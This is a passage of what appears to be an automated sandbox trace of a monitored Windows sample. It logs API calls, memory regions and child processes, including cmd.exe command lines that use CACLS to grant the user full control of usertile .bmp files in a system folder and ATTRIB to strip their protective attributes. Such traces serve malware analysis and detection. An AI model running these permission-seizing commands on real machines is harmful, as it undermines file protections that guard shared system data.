SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.040] GetEnvironmentStringsW () returned 0x2c2410* [0185.041] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.041] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.041] GetEnvironmentStringsW () returned 0x2c2410* [0185.041] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.041] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0185.041] GetConsoleTitleW (in: lpConsoleTitle=0x1cf27c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.041] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.041] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2be4d8 [0185.042] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0xffffffff [0185.042] GetLastError () returned 0x2 [0185.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ceb18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceb18) returned 0x2be4d8 [0185.042] FindClose (in: hFindFile=0x2be4d8 | out: hFindFile=0x2be4d8) returned 1 [0185.042] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.043] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.043] GetConsoleTitleW (in: lpConsoleTitle=0x1cf010, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.043] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cee98, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cef60 | out: lpAttributeList=0x1cee98, lpSize=0x1cef60) returned 1 [0185.043] UpdateProcThreadAttribute (in: lpAttributeList=0x1cee98, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cef58, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cee98, lpPreviousValue=0x0) returned 1 [0185.043] GetStartupInfoW (in: lpStartupInfo=0x1cee54 | out: lpStartupInfo=0x1cee54*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.043] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.043] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1ceef4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cef40 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"", lpProcessInformation=0x1cef40*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd3c, dwThreadId=0xd8c)) returned 1 [0185.045] CloseHandle (hObject=0x50) returned 1 [0185.045] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.045] GetEnvironmentStringsW () returned 0x2c2410* [0185.045] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.046] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.097] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cee34 | out: lpExitCode=0x1cee34*=0x0) returned 1 [0185.097] CloseHandle (hObject=0x4c) returned 1 [0185.097] _vsnwprintf (in: _Buffer=0x1cef7c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cee40 | out: _Buffer="00000000") returned 8 [0185.097] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.097] GetEnvironmentStringsW () returned 0x2c2410* [0185.097] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.097] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.097] GetEnvironmentStringsW () returned 0x2c2410* [0185.097] FreeEnvironmentStringsW (penv=0x2c2410) returned 1 [0185.097] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cee98 | out: lpAttributeList=0x1cee98) [0185.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.097] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.098] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.098] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.098] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.098] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.098] SetConsoleInputExeNameW () returned 0x1 [0185.098] GetConsoleOutputCP () returned 0x1b5 [0185.098] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.098] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.098] exit (_Code=0) Process: id = "368" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0x3dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "367" os_parent_pid = "0xd48" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26309 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26310 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26311 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26312 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 26313 start_va = 0xf90000 end_va = 0xf98fff entry_point = 0xf90000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26314 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26315 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26317 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 26318 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26319 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26320 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26321 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26322 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26323 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 26324 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26325 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26326 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26327 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26328 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26329 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26330 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 527 os_tid = 0xe28 Thread: id = 528 os_tid = 0xcf4 Process: id = "369" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "367" os_parent_pid = "0xd48" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26331 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26332 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26333 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26334 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26335 start_va = 0x870000 end_va = 0x876fff entry_point = 0x870000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26336 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26337 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26338 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26339 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26340 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26341 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26342 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26343 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26344 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26345 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 26346 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26347 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26348 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26349 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26350 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26351 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26352 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26353 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26354 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26355 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26356 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26357 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26358 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 26359 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26360 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 529 os_tid = 0xd8c Process: id = "370" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26361 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26362 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26363 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26364 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 26365 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26366 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26367 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26368 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26369 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 26370 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26371 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26372 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26373 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 26374 start_va = 0x1a0000 end_va = 0x206fff entry_point = 0x1a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26375 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 26376 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26377 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26378 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26379 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26380 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26381 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26382 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26383 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26384 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26385 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 26386 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26387 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26388 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 26389 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 26390 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 26391 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 26392 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 26393 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 26394 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 26395 start_va = 0x12f0000 end_va = 0x15befff entry_point = 0x12f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 530 os_tid = 0x8ec [0185.356] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fa64 | out: lpSystemTimeAsFileTime=0x30fa64*(dwLowDateTime=0xa3630020, dwHighDateTime=0x1d440a9)) [0185.356] GetCurrentProcessId () returned 0xd44 [0185.356] GetCurrentThreadId () returned 0x8ec [0185.356] GetTickCount () returned 0x35002 [0185.356] QueryPerformanceCounter (in: lpPerformanceCount=0x30fa5c | out: lpPerformanceCount=0x30fa5c*=24214512960) returned 1 [0185.356] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0185.357] __set_app_type (_Type=0x1) [0185.357] __p__fmode () returned 0x76b331f4 [0185.357] __p__commode () returned 0x76b331fc [0185.357] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0185.357] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0185.357] GetCurrentThreadId () returned 0x8ec [0185.357] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8ec) returned 0x38 [0185.357] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.357] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0185.357] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0185.357] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f9f4 | out: phkResult=0x30f9f4*=0x0) returned 0x2 [0185.357] VirtualQuery (in: lpAddress=0x30fa2b, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f9c4, dwLength=0x1c | out: lpBuffer=0x30f9c4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0185.357] VirtualQuery (in: lpAddress=0x213000, 